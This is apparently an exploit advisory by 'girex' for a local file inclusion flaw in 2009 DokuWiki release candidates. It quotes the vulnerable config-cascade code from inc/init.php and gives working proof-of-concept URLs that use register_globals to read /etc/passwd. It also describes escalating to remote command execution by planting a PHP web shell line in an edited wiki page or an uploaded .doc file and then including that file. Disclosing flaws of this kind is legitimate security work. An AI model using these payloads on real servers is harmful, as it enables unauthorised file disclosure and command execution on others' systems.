# Author_ girex # Homepage_ girex.altervista.org # CMS_ Dokuwiki # Homepage_ dokuwiki.org # Affected versions_ 2009-02-14 rc2009-02-06 rc2009-01-30 # Bug_ Local file inclusion # Need_ register_globals = On # Vuln description_ # File: /inc/init.php // if available load a preload config file $preload = fullpath(dirname(__FILE__)).'/preload.php'; if (@file_exists($preload)) include($preload); ... //set the configuration cascade - but only if its not already been set in preload.php global $config_cascade; if (empty($config_cascade)) { $config_cascade = array( 'main' => array( 'default' => array(DOKU_CONF.'dokuwiki.php'), 'local' => array(DOKU_CONF.'local.php'), 'protected' => array(DOKU_CONF.'local.protected.php'), ), ... // load the global config file(s) foreach (array('default','local','protected') as $config_group) { if (empty($config_cascade['main'][$config_group])) continue; foreach ($config_cascade['main'][$config_group] as $config_file) { if (@file_exists($config_file)) { include($config_file); } } } # File preload.php doesn't exists. (so seems for the affected versions) # So we can set $config_cascade arrays via register globals # It's not a RFI couse use of file_exists function. # First of all you can check the dokuwiki's version here: # /[host]/[path]/VERSION # and check if it's a vulnerable version # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README # Note: # You can obtain a remote command execution if you can edit the content of a page # Just insert your php code into it like: <?php system($_GET[cmd]); ?> # And include it: # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt # Or you can check if you have permissions to upload file via: # [host]/[path]/lib/exe/mediamanager.php # If so, upload your file with .doc extension then include it: # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc